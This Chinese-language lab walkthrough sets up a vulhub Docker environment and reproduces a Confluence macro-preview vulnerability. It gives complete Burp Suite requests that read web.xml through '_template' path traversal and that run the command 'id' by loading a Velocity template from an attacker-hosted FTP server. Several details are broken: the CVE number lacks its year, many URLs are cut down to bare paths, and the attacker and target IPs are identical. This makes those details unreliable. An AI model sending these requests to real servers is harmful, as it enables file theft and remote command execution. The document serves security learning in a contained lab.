搭建环境之前,最好将虚拟机的内存调至4G
靶机ip:192.168.187.130,os:centos7
攻击主机:ip:192.168.187.130, os:kali,工具:burpsuite
(一)安装pip,docker环境
由于docker-compose需要pip来安装,首先要安装pip环境
1.安装docker
用root账户登陆linux,我这里用的centos7,其他的linux系统也可以
然后执行
curl -s / | sh
然后执行docker -v查看docker是否安装成功
2.安装pip
curl -s https://bootstrap.pypa.io/get-pip.py|python
可以看到成功安装了两个工具,这里再检查一下有没有安装setuptools工具
执行pip install setuptools
检查pip版本pip -V
3. pip安装docker-compose
这里可能会遇到很多报错,参考/felixqiang/p/11946644.html解决
当出现这个时,意味着docker-compose成功安装
docker-compose -v查看版本号
4.克隆vulhub的github库
yum install git,首先安装git
git clone /vulhub/vulhub,克隆vulhub库,可以下载可能会比较慢
到这里结束建议保存快照,每次做完一个漏洞复现就可以恢复快照从而恢复环境
或者输入docker-compose down移除环境
(二)启动环境
1.启动docker环境
cd vulhub/confluence/CVE--3396/,进入CVE--3396目录
systemctl start docker,启动docker
systemctl status docker,检查docker是否在运行
docker-compose build && docker-compose up -d,启动漏洞环境
这里搭建时间会很久,可以搞一个加速器
sudo vi /etc/docker/daemon.json
请在该配置文件中加入(没有该文件的话,请先建一个):
{"registry-mirrors": ["http://hub-mirror."]}
出现这个说明启动成功了
再看一下8090端口是否启动
2.启动Confluence环境
在当前linux系统访问http://localhost:8090/,选择Trial Installation
这里会要求填写license key,先不要着急,点击Get an evaluation license,获取一个临时证书
之后他会让你注册一个账户,按要求注册即可,不需要个人信息,也不需要花钱,注册好后登陆
会来的申请证书的界面,按图示操作即可(不要选择Data Center和Addons)
然后进入License,选择一个证书
复制License Key
粘贴到之前这个页面的Confluence框,如果找不到这个页面就在地址栏输入localhost:8090
然后点击Next安装即可。这一步小内存VPS可能安装失败或时间较长(建议使用4G内存以上的机器进行安装与测试),请耐心等待。这里千万不要中断。
如果提示填写cluster node,路径填写/home/confluence即可。
后续可能要求你填写数据库账号密码,选择postgres数据库,地址为db,账号密码均为postgres:
至此靶机环境已经搭建完成
(四)漏洞复现
Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。
我在kali上打开burpsuite,选择Repeater,输入如下文本,把localhost替换成靶机的ip地址,如果攻击主机和靶机是同一台机器则不用
POST /rest/tinymce/1/macro/preview HTTP/1.1Host: localhost:8090Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeReferer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&Content-Type: application/json; charset=utf-8Content-Length: 176{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}
点击GO执行,拿到账户文件
抓取web.xml,将localhost替换为靶机ip,如果攻击主机和靶机是同一台机器则不用,burpsuite输入如下文本
POST /rest/tinymce/1/macro/preview HTTP/1.1Host: localhost:8090Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeReferer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&Content-Type: application/json; charset=utf-8Content-Length: 172{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}
拿到web.xml
6.12以前的Confluence没有限制文件读取的协议和路径,我们可以使用file:///etc/passwd来读取文件,也可以通过https://...来加载远程文件(在攻击主机上完成该步骤)
git clone /Yt1g3r/CVE--3396_EXP.git //先下载EXP
然后用python搭建一个临时的ftp服务器
pip install pyftpdlib
cd CVE--3396_EXP //进入这个目录
python -m pyftpdlib -p 21 //启动FTP服务
将localhost替换为靶机ip,ip:port替换为攻击主机ip和21端口如果攻击主机和靶机是同一台机器则不用,在burpsuite输入如下文本
POST /rest/tinymce/1/macro/preview HTTP/1.1Host: localhost:8090Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeReferer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&Content-Type: application/json; charset=utf-8Content-Length: 198{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"/v/23464dc6","width":"1000","height":"1000","_template":"ftp://ip:port/cmd.vm","cmd":"id"}}}
拿到uid
至此,漏洞复现完成。
可以参考Vulhub官方的复现教程
/#/environments/confluence/CVE--3396/
参考文献:/jiangbuliu/article/details/94016753
/1461.html
